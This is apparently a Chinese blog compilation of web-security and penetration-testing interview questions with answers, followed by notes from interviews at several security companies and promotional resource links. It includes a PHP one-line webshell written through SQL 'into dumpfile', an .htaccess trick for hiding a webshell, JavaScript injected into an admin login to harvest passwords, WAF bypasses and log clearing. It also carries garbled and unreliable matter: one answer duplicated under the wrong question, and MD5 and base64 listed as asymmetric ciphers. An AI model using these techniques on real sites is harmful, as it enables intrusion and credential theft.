【2023最新】我把面试问烂了的Web安全集合总结了一下(带答案)建议收藏
人人都有一個進大廠的夢想,而進大廠的門檻也可想而知,所以這里整理了一份安全大廠的面試大全,看完文章如果對你有幫助的話希望能夠點贊+收藏+關注!感謝!
本篇文章對于學習Web安全的朋友來說應該是目前最全面的面試題合集了,后續也會陸續更新其他大廠的面試題目和知識點。另外我還整理了許多關于Web安全的學習資料+工具包等等,需要的點擊滲透測試學習
一、滲透測試面試題,包含大量滲透技巧
1.拿到一個待檢測的站,你覺得應該先做什么?
a、信息收集
b、漏洞掃描
開始檢測漏洞,如XSS,XSRF,sql注入,代碼執行,命令執行,越權訪問,目錄讀取,任意文件讀取,下載,文件包含,遠程命令執行,弱口令,上傳,編輯器漏洞,暴力破解等
c、漏洞利用
利用以上的方式拿到webshell,或者其他權限
d、權限提升
提權服務器,比如windows下mysql的udf提權,serv-u提權,windows低版本的漏洞,如iis6,pr,巴西烤肉,linux臟牛漏洞,linux內核版本漏洞提權,linux下的mysql system提權以及oracle低權限提權
e、日志清理
f、總結報告及修復方案
2.判斷出網站的CMS對滲透有什么意義?
查找網上已曝光的程序漏洞。
如果開源,還能下載相對應的源碼進行代碼審計。
3.一個成熟并且相對安全的CMS,滲透時掃目錄的意義?
敏感文件、二級目錄掃描
站長的誤操作比如:網站備份的壓縮文件、說明.txt、二級目錄可能存放著其他站點
4.常見的網站服務器容器
IIS、Apache、nginx、Lighttpd、Tomcat
5.mysql注入點,用工具對目標站直接寫入一句話,需要哪些條件?
root權限以及網站的絕對路徑。
6.目前已知哪些版本的容器有解析漏洞,具體舉例。
a、IIS 6.0
/xx.asp/xx.jpg "xx.asp"是文件夾名
b、IIS 7.0/7.5
默認Fast-CGI開啟,直接在url中圖片地址后面輸入/1.php,會把正常圖片當成php解析
c、Nginx
版本小于等于0.8.37,利用方法和IIS 7.0/7.5一樣,Fast-CGI關閉情況下也可利用??兆止澊a xxx.jpg.php
d、Apache 上傳的文件命名為:test.php.x1.x2.x3,Apache是從右往左判斷后綴
e、lighttpd xx.jpg/xx.php,不全,請小伙伴們在評論處不吝補充,謝謝!
7.如何手工快速判斷目標站是windows還是linux服務器?
linux大小寫敏感,windows大小寫不敏感。
8.為何一個mysql數據庫的站,只有一個80端口開放?
- 更改了端口,沒有掃描出來
- 站庫分離
- 3306端口不對外開放
9、3389無法連接的幾種情況
- 沒開放3389 端口
- 端口被修改
- 防護攔截
- 處于內網(需進行端口轉發)
10.如何突破注入時字符被轉義?
- 寬字符注入
- hex編碼繞過
11.在某后臺新聞編輯界面看到編輯器,應該先做什么?
查看編輯器的名稱版本,然后搜索公開的漏洞。
12.拿到一個webshell發現網站根目錄下有.htaccess文件,我們能做什么?
能做的事情很多,用隱藏網馬來舉例子:
插入
<FilesMatch “xxx.jpg”> SetHandler application/x-httpd-php.jpg文件會被解析成.php文件。
具體其他的事情,不好詳說,建議大家自己去搜索語句來玩玩。
13.注入漏洞只能查賬號密碼?
只要權限廣,拖庫脫到老。
14.安全狗會追蹤變量,從而發現出是一句話木馬嗎?
是根據特征碼,所以很好繞過了,只要思路寬,繞狗繞到歡,但這應該不會是一成不變的。
15.access 掃出后綴為asp的數據庫文件,訪問亂碼,**如何實現到本地利用?
迅雷下載,直接改后綴為.mdb。
16.提權時選擇可讀寫目錄,為何盡量不用帶空格的目錄?
因為exp執行多半需要空格界定參數
17.某服務器有站點A,B 為何在A的后臺添加test用戶,訪問B的后臺。發現也添加上了test用戶?
同數據庫。
18.注入時可以不使用and 或or 或xor,直接order by 開始注入嗎?
and/or/xor,前面的1=1、1=2步驟只是為了判斷是否為注入點,如果已經確定是注入點那就可以省那步驟去。
19:某個防注入系統,在注入時會提示:
系統檢測到你有非法注入的行為。
已記錄您的ip xx.xx.xx.xx
時間:2016:01-23
提交頁面:test.asp?id=15
提交內容:and 1=1
20、如何利用這個防注入系統拿shell?
在URL里面直接提交一句話,這樣網站就把你的一句話也記錄進數據庫文件了 這個時候可以嘗試尋找網站的配置文件 直接上菜刀鏈接。
21.上傳大馬后訪問亂碼時,有哪些解決辦法?
瀏覽器中改編碼。
22.審查上傳點的元素有什么意義?
有些站點的上傳文件類型的限制是在前端實現的,這時只要增加上傳類型就能突破限制了。
23.目標站禁止注冊用戶,找回密碼處隨便輸入用戶名提示:“此用戶不存在”,你覺得這里怎樣利用?
先爆破用戶名,再利用被爆破出來的用戶名爆破密碼。
其實有些站點,在登陸處也會這樣提示
所有和數據庫有交互的地方都有可能有注入。
24.目標站發現某txt的下載地址為http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?
這就是傳說中的下載漏洞!在file=后面嘗試輸入index.php下載他的首頁文件,然后在首頁文件里繼續查找其他網站的配置文件,可以找出網站的數據庫密碼和數據庫的地址。
25.甲給你一個目標站,并且告訴你根目錄下存在/abc/目錄,并且此目錄下存在編輯器和admin目錄。請問你的想法是?
直接在網站二級目錄/abc/下掃描敏感文件及目錄。
26.在有shell的情況下,如何使用xss實現對目標站的長久控制?
后臺登錄處加一段記錄登錄賬號密碼的js,并且判斷是否登錄成功,如果登錄成功,就把賬號密碼記錄到一個生僻的路徑的文件中或者直接發到自己的網站文件中。(此方法適合有價值并且需要深入控制權限的網絡)。
在登錄后才可以訪問的文件中插入XSS腳本。
27.后臺修改管理員密碼處,原密碼顯示為*。你覺得該怎樣實現讀出這個用戶的密碼?
審查元素 把密碼處的password屬性改成text就明文顯示了
28.目標站無防護,上傳圖片可以正常訪問,上傳腳本格式訪問則403.什么原因?
原因很多,有可能web服務器配置把上傳目錄寫死了不執行相應腳本,嘗試改后綴名繞過
29.審查元素得知網站所使用的防護軟件,你覺得怎樣做到的?
在敏感操作被攔截,通過界面信息無法具體判斷是什么防護的時候,F12看HTML體部 比如護衛神就可以在名稱那看到內容。
30.在win2003服務器中建立一個 .zhongzi文件夾用意何為?
隱藏文件夾,為了不讓管理員發現你傳上去的工具。
31、sql注入有以下兩個測試選項,選一個并且闡述不選另一個的理由
A. demo.jsp?id=2+1
B. demo.jsp?id=2-1
選B,在 URL 編碼中 + 代表空格,可能會造成混淆
32、以下鏈接存在 sql 注入漏洞,對于這個變形注入,你有什么思路?
demo.do
DATA有可能經過了 base64 編碼再傳入服務器,所以我們也要對參數進行 base64 編碼才能正確完成測試
33、發現 demo.jsp?uid=110 注入點,你有哪幾種思路獲取 webshell,哪種是優選?
有寫入權限的,構造聯合查詢語句使用using INTO OUTFILE,可以將查詢的輸出重定向到系統的文件中,這樣去寫入 WebShell 使用 sqlmap –os-shell 原理和上面一種相同,來直接獲得一個 Shell,這樣效率更高 通過構造聯合查詢語句得到網站管理員的賬戶和密碼,然后掃后臺登錄后臺,再在后臺通過改包上傳等方法上傳 Shell
34、CSRF 和 XSS 和 XXE 有什么區別,以及修復方式?
XSS是跨站腳本攻擊,用戶提交的數據中可以構造代碼來執行,從而實現竊取用戶信息等攻擊。修復方式:對字符實體進行轉義、使用HTTP Only來禁止JavaScript讀取Cookie值、輸入時校驗、瀏覽器與Web應用端采用相同的字符編碼。
CSRF是跨站請求偽造攻擊,XSS是實現CSRF的諸多手段中的一種,是由于沒有在關鍵操作執行時進行是否由用戶自愿發起的確認。修復方式:篩選出需要防范CSRF的頁面然后嵌入Token、再次輸入密碼、檢驗Referer XXE是XML外部實體注入攻擊,XML中可以通過調用實體來請求本地或者遠程內容,和遠程文件保護類似,會引發相關安全問題,例如敏感文件讀取。修復方式:XML解析庫在調用時嚴格禁止對外部實體的解析。
35、CSRF、SSRF和重放攻擊有什么區別?
CSRF是跨站請求偽造攻擊,由客戶端發起 SSRF是服務器端請求偽造,由服務器發起 重放攻擊是將截獲的數據包進行重放,達到身份認證等目的
36、說出至少三種業務邏輯漏洞,以及修復方式?
密碼找回漏洞中存在
1)密碼允許暴力破解、
2)存在通用型找回憑證、
3)可以跳過驗證步驟、
4)找回憑證可以攔包獲取
等方式來通過廠商提供的密碼找回功能來得到密碼。
身份認證漏洞中最常見的是
1)會話固定攻擊
2) Cookie 仿冒
只要得到 Session 或 Cookie 即可偽造用戶身份。
驗證碼漏洞中存在
1)驗證碼允許暴力破解
2)驗證碼可以通過 Javascript 或者改包的方法來進行繞過
37、圈出下面會話中可能存在問題的項,并標注可能會存在的問題?
有寫入權限的,構造聯合查詢語句使用using INTO OUTFILE,可以將查詢的輸出重定向到系統的文件中,這樣去寫入 WebShell 使用 sqlmap –os-shell 原理和上面一種相同,來直接獲得一個 Shell,這樣效率更高 通過構造聯合查詢語句得到網站管理員的賬戶和密碼,然后掃后臺登錄后臺,再在后臺通過改包上傳等方法上傳 Shell
38、給你一個網站你是如何來滲透測試的?在獲取書面授權的前提下
39、sqlmap,怎么對一個注入點注入?
40、nmap,掃描的幾種方式
41、sql注入的幾種類型?
42、報錯注入的函數有哪些?10個
43、延時注入如何來判斷?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
44、盲注和延時注入的共同點?
都是一個字符一個字符的判斷
45、如何拿一個網站的webshell?
上傳,后臺編輯模板,sql注入寫文件,命令執行,代碼執行, 一些已經爆出的cms漏洞,比如dedecms后臺可以直接建立腳本文件,wordpress上傳插件包含腳本文件zip壓縮包等
46、sql注入寫文件都有哪些函數?
- select ‘一句話’ into outfile ‘路徑’
- select ‘一句話’ into dumpfile ‘路徑’
- select ‘<?php eval($\_POST\[1\]) ?>’
- into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;
47、如何防止CSRF?
1,驗證referer
2,驗證token
詳細:http://cnodejs.org/topic/5533dd6e9138f09b629674fd
48、owasp 漏洞都有哪些?(2021版)
- 訪問控制失效
- 加密失敗
- 注入
- 不安全設計
- 安全配置錯誤
- 脆弱過時組件
- 識別與認證失敗
- 軟件和數據完整性故障
- 安全日志與監測失敗
- 服務器端請求偽造
49、SQL注入防護方法?
- 使用安全的API
- 對輸入的特殊字符進行Escape轉義處理
- 使用白名單來規范化輸入驗證方法
- 對客戶端輸入進行控制,不允許輸入SQL注入相關的特殊字符
- 服務器端在提交數據庫進行SQL查詢之前,對特殊字符進行過濾、轉義、替換、刪除。
50、代碼執行,文件讀取,命令執行的函數都有哪些?
1)代碼執行:
eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function2)文件讀取:
file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等3)命令執行:
system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()51、img標簽除了onerror屬性外,還有其他獲取管理員路徑的辦法嗎?
src指定一個遠程的腳本文件,獲取referer
52、img標簽除了onerror屬性外,并且src屬性的后綴名,必須以.jpg結尾,怎么獲取管理員路徑。
1)遠程服務器修改apache配置文件,配置.jpg文件以php方式來解析 AddType application/x-httpd-php .jpg <img src=http://xss.tv/1.jpg> 會以php方式來解析
53、為什么aspx木馬權限比asp大?
aspx使用的是.net技術。IIS 中默認不支持,ASP只是腳本語言而已。入侵的時候asp的木馬一般是guest權限…APSX的木馬一般是users權限。
54、如何繞過waf?
- 大小寫轉換法
- 干擾字符 /*!*/
- 編碼 base64 unicode hex url ascll
- 復參數
55、如何向服務器寫入webshell?
各種上傳漏洞
mysql具有寫入權限,用sql語句寫入shell
http put方法
56、滲透測試中常見的端口
a、web類(web漏洞/敏感目錄) 第三方通用組件漏洞struts thinkphp jboss ganglia zabbix
80 web
80-89 web
8000-9090 web
b、數據庫類(掃描弱口令)
1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL
c、特殊服務類(未授權/命令執行類/漏洞)
443 SSL心臟滴血
873 Rsync未授權
5984 CouchDB http://xxx:
5984/_utils/
6379 redis未授權
7001,7002 WebLogic默認弱口令,反序列
9200,9300 elasticsearch 參考WooYun: 多玩某服務器ElasticSearch命令執行漏洞
11211 memcache未授權訪問
27017,27018 Mongodb未授權訪問
50000 SAP命令執行
50070,50030 hadoop默認端口未授權訪問
d、常用端口類(掃描弱口令/端口爆破)
21 ftp
22 SSH
23 Telnet
2601,2604 zebra路由,默認密碼zebra
3389 遠程桌面
ALL、端口合計詳情
3306 MySQL
3312/3311 kangle主機管理系統登陸
3389 遠程桌面
4440 rundeck 參考WooYun: 借用新浪某服務成功漫游新浪內網
5432 PostgreSQL
5900 vnc
5984 CouchDB http://xxx:
5984/_utils/
6082 varnish 參考WooYun: Varnish HTTP accelerator CLI 未授權訪問易導致網站被直接篡改或者作為代理進入內網
6379 redis未授權
7001,7002 WebLogic默認弱口令,反序列
7778 Kloxo主機控制面板登錄
8000-9090 都是一些常見的web端口,有些運維喜歡把管理后臺開在這些非80的端口上
8080 tomcat/WDCP主機管理系統,默認弱口令
8080,8089,9090 JBOSS
8083 Vestacp主機管理系統 (國外用較多)
8649 ganglia
8888 amh/LuManager 主機管理系統默認端口
9200,9300 elasticsearch 參考WooYun: 多玩某服務器ElasticSearch命令執行漏洞
10000 Virtualmin/Webmin 服務器虛擬主機管理系統
11211 memcache未授權訪問
27017,27018 Mongodb未授權訪問
28017 mongodb統計頁面
50000 SAP命令執行
50070,50030 hadoop默認端口未授權訪問
二、各大廠面試題
1.深信服面試題
難度系數:中
一面: 時間太久了,記不太清了,難度相對還是可以的
二面:
~sql注入的原理是什么
– 本質:將用戶輸入的不可信數據當作代碼去執行
– 條件:用戶能控制輸入;;;原本程序要執行的代碼,拼接了用戶輸入的內容,然后執行
~說說Linux的信號機制?
~Java還記得多少
~python用過哪些庫,寫過什么項目
//還有一些,時間有點久遠,記不太清了。
//說實話,hr貌似水平不是太厲害,而且不僅僅問的web安全知識
//總之大家要放輕松,自信面就行。有幾個地方沒回答上,以為沒過,后來三面打電話過來才知道通過了。
hr面:
~自我介紹
– 講述自己學習安全的經歷
~為什么投深信服
– 自己對網安感興趣、XXX公司是個大企業;;有很多學長也在XXX工作;;老師在課堂提到過XXX公司不錯
~職業規劃未來三年、五年
~最有成就的一件事
~還有什么想問的
~對簡歷信息進行有針對的提問
~想在哪工作
//微信視頻面試的
綜合來說深信服的面試難度還是可以的,但是時間有點久遠,記不太多了
2.啟明星辰面試題
難度系數:中
二面:
~自我介紹–>對安全的學習
~sql注入用過哪些函數
– limit()、concat()、group_concat()、Substr()、Ascii()、Left()
– length()、updataxml()等等吧
~你的ATP攻擊步驟
~sql注入的原理是什么,怎么防范
– 原理:本質、條件,可以多提一些都有哪些種類(如,顯錯有哪幾種,盲注有哪幾種,特別的幾種(寬字節、反彈、偏移、DNS、二階等))
– 防范:第一是正則過濾(安全狗、D盾等等)、第二是數據庫預處理等
~挖掘src的主要是什么漏洞
~參加過哪些ctf比賽
~有沒有自己寫過工具
~還有沒有想問的
~對哪些方面比較熟悉
~有沒有過app測試的經歷
//這也是二面,一面記得也不是太清楚了 反正不是多難
最后一面
~沒啥技術面,主要問問期待什么薪資
~什么時候可以上崗
3.奇安信面試題
難度系數:高
一面:
~沒有自我介紹
~只要是簡歷上的基本上都會問
~MVC框架詳細說一下
– 談談MVC模式 - 阮一峰的網絡日志
~詳細介紹一下sql注入
– 原理、條件、分類等等
~xss與csrf的區別
– 一個是盜取cookie、一個是利用cookie
~csrf的原理以及如何防范–>這往深入問了
– 訪問A站的同時訪問了B站(惡意站點)、
– B站腳本讓瀏覽器帶著B站準備好的語句去提交A站服務器
– A站沒有csrf防護–>被攻擊
~還有什么你擅長的但是沒有問道的嗎 -->xxe
~講一下xxe的原理
– 本質:簡單的說,就是XML外部實體注入攻擊
– 原理:DTD部分去讀取敏感的信息、將讀取到的信息賦值到實體當中、XML部分使用的過程中,將實體內容輸出
– 危害:讀取任意文件、執行系統命令、探測內網端口、攻擊內網網站等
~xxe會用到哪些函數
– simplexml_load_string
~文件上傳,詳細說說,
– 客戶端檢測:客戶端校驗、如何判斷是前端檢測、突破方法、黑白名單機制
– 服務端檢測:服務端檢測幾個常見的手段、制作圖片馬(隱寫)
~常見的web容器有哪些
–apache、tomcat、IIS、Nginx等
~apache 7.0文件上傳黑名單怎么繞過,詳細說說
– 改后綴(php. php_ php4 phptml php空格等)
– htaccess文件繞過、win文件流繞過(隱寫)
~密碼學的對稱密碼與非對稱密碼有哪些
– 對稱:DES、3DES、AES等
– 非對稱:md5、base64等
~md5是不是對稱加密
– 不是
~apache可以執行php文件嗎
– 可以
~學過哪些數據庫,(了解哪些數據庫)
– mysql、Oracle、sql servers、access
~說說反序列化的原理
– 序列化:將php中對象、類、數組、變量、匿名函數等,轉化為字符串 方便保存到數據庫或者文件中(將狀態信息保存為字符串)
– 反序列化: 將字符串保存為狀態信息
~反序列化會用到哪些函數
– php的unserialize()函數
– 反序列化貌似hr更想問java的
– 更多請百度:WebLogic 反序列化,將這個理解透徹和hr聊問題就不大了
~xxe有沒有實戰過
~java的多線程
~python有過哪些項目,寫過什么東西
~之前python學到什么地方
4.京東面試題
難度系數:中
一面: (安全研發部門面試)
~首先根據簡歷提問
~問我的一個項目完成的怎么的樣了,//簡歷中的
~Java基礎怎么樣,
~有沒有自己動手寫過一些工具
~有沒有想過自己以后要寫一下掃描器
~sql注入的簡單原理及其如何防御
~有沒有了解過反序列化 尤其是Java方向的
~數據結構還記得多少
~src主要挖掘一些什么類型的漏洞
~了解的MSF框架怎么樣
~數據庫主要了解的哪些,主要學的什么數據庫
~ssrf的原理及其防御 —> 這有深入
– 定義:簡單說,利用某站點發送請求攻擊其他目標站點(借刀殺人)
– 聊聊主流防御 - 防外不防內
– 危害:內網滲透(讀取敏感文件、探測端口–>6379端口的Redis可以說說)
– 防御:限制請求的端口、過濾返回的信息、黑名單內網ip等
5.知道創宇面試題
難度系數:中
一面:
簡單的自我介紹一下吧
了解sql注入嗎
本質、 條件、分類、攻擊步驟
sql注入怎么防范呢
正則過濾、數據庫預處理
數據庫預處理怎么突破呢
limit后是不可控的
知道httponly嗎
主要是防止xss偷取cookie的
sql注入如何getshell
回答寫一句馬。mysql有兩個兩個函數可以寫文件 //dumpfile與into_outfile
額外提到6379端口靶場redis貌似就是直接寫一句馬,菜刀連接
mysql寫文件需要什么條件
用到into_outfile或者dumpfile函數
要有寫的權限,知道絕對路徑,能用單引號,要有file權限
了解內網滲透嗎
6.阿里面試題
難度系數:高
筆試:(無聊)
測試面試者綜合水平,題目類似公務員(不是技術性得題目)
一面:(簡單)
簡單了解情況,技術面加hr面
比如自我介紹,大學幾年最得意(驕傲)得事
你最擅長的領域,你得優缺點
技術問題就不說了,比較基礎
(需要注意的是,比起攻擊,更在意的是如何修復、加固)
最后,還有什么要問我得嗎
二面:(綜合)
簡歷中的各類項目
什么級別?(國家級、省級等)
怎么樣了,進度如何?
遇到哪些問題?怎么解決的?
用到哪些框架、什么語言、多少成員
如何分工,你負責什么?詳細說說
以上每一個話題都會繼續追問下去,直到你回答不上來
密碼學
了解哪些加密算法,說說
對稱加密與非對稱加密的應用場景
還有一些,想不起來了
因為這一塊我學的不是太好,就不多說了
以上每一個話題都會繼續追問下去,直到你回答不上來
ctf
負責哪些題型、在團隊中的角色
拿過哪些獎項、參加過哪些賽事
說說遇到的一些(印象深的題目)
以上每一個話題都會繼續追問下去,直到你回答不上來
除安全之外,還參加過哪些類型比賽?
比如:全國大學生建模比賽
人工智能國賽、大數據國賽等
以上每一個話題都會繼續追問下去,直到你回答不上來
你的優點是什么?有什么你認為你能做,別人不能做的?
這里可以回答白盒審計,舉例一些自己的cnvd證書(較高的加分項)
以上每一個話題都會繼續追問下去,直到你回答不上來
Java語言,
學的怎么樣?拿過什么關于java編程算法的獎項?
(面試我得hr是主攻java的)
以上每一個話題都會繼續追問下去,直到你回答不上來
計算機網絡
說說七層模型、
網絡層動態連接的有幾個協議、區別是什么(有什么異同)
以上每一個話題都會繼續追問下去,直到你回答不上來
web安全
sql注入的防御方法,如何避免出現sql注入
反序列化相關問題(這又聯系到了java)
你還會什么?多說說你覺得你會別人不會的?
你的技能里邊最擅長什么?
以上每一個話題都會繼續追問下去,直到你回答不上來
經歷
有哪些較難忘的校園經歷?
遇到哪些棘手問題?如何解決的?
大概就這么多內容吧,其中web方向的內容并不太多,更多的是綜合知識掌握。
多說一點,阿里相對來說對學歷看重一些,名牌985院校本身就是加分項;
此外最好能拿到幾本cnvd證書、月榜上幾次
附帶:稍微總結一下面試的一些難點
1.如何分辨base64
長度一定會被4整除
很多都以等號結尾(為了湊齊所以結尾用等號),當然也存在沒有等號的base64
僅有 英文大小寫、數字、+ /
base64不算加密,僅僅是一門編碼
2.如何分辨MD5 //(特點)
一般是固定長度32位(也有16位) // 16 位實際上是從 32 位字符串中,取中間的第 9 位到第 24 位的部分
容易加密
細微偏差得到最終的值差距很大
md5加密是一種不可逆的加密算法 //不過貌似我國的王小云院士通過碰撞算法破解了
最后,md5經過計算得出128位2進制,正常的32位是二進制轉換為16進制
在線網站一般是通過每日加密存儲到數據庫,與用戶查詢做對比
3.柵欄密碼
類似藏頭詩,凱撒密碼是柵欄密碼的一種
4.sqlmap如何爆出當前庫
–current -db
5.namp中區分大小寫嗎
區分大小寫!
—O 操作系統檢測 —A 操作系統與版本檢測
6.Oracle的默認端口 //相似的問題,mysql,sql server的端口
分別是1521 3306 1433
7.mysql的管理員密碼一般存放在哪
//連接登錄mysql的 不是網站后臺登錄密碼
mysql庫下的user表中—>一般是經過md5加密后的
8.cdn的作用
存數據,緩解主服務器壓力
中轉數據
一定程度上保護了主服務器 —》 被Ddos后,打了一個假的服務器
9.如何確認網站真實IP
子域名,有可能是真實的IP
國外站點去ping
讓服務器給自己發郵件----> 打開郵件–>右側更多設置---->顯示郵件原文---->直接看到
10.sql注入,禁用substr()函數,用哪些函數替代
mid()函數 <—mysql
substring()函數 <—mysql,sql server
left()函數 <—mysql
11.如何防范sql注入
正則匹配過濾 <—主流防護,比如,安全狗與D盾
使用數據庫中的預處理
原理:先將查詢語句固定
通過函數將傳參變為字符串
拼接字符串去執行
你的關鍵字根本不會當作關鍵字去執行
根本思路: 避免數據變成代碼被執行,時刻分清代碼和數據的界限
12.ssrf的危害
重點是突進內網,內網滲透
讀取敏感文件 —>file協議
探測端口 —>dict協議
進階之6379端口的Redis (可以看作一個數據庫) --> 默認無密碼 —> 寫入一句馬
13.web容器的解析漏洞
忘了收集了,大家先自行收集一下吧
有時間會補上的
14.同源性法則
解釋一下,何為同源:協議、域名、端口都一樣就是同源 //
http、https、
a.com、b.com
url:80、url:90
?最后
為了幫助大家更好的學習網絡安全,小編給大家準備了一份網絡安全入門/進階學習資料,里面的內容都是適合零基礎小白的筆記和資料,不懂編程也能聽懂、看懂,所有資料共282G,朋友們如果有需要全套網絡安全入門+進階學習資源包,可以點擊免費領取(如遇掃碼問題,可以在評論區留言領取哦)~
CSDN大禮包:《黑客&網絡安全入門&進階學習資源包》免費分享
網絡安全源碼合集+工具包
??
網絡安全面試題
最后就是大家最關心的網絡安全面試題板塊
所有資料共282G,朋友們如果有需要全套網絡安全入門+進階學習資源包,可以 點擊免費領取 (如遇掃碼問題,可以在評論區留言領取哦)~
黑客/網安大禮包:《黑客&網絡安全入門&進階學習資源包》免費分享
?視頻配套資料&國內外網安書籍、文檔
黑客/網安大禮包:《黑客&網絡安全入門&進階學習資源包》免費分享
總結
以上是生活随笔為你收集整理的【2023最新】我把面试问烂了的Web安全集合总结了一下(带答案)建议收藏的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: VIM向上搜索和向下搜索
- 下一篇: 忽然之间。。。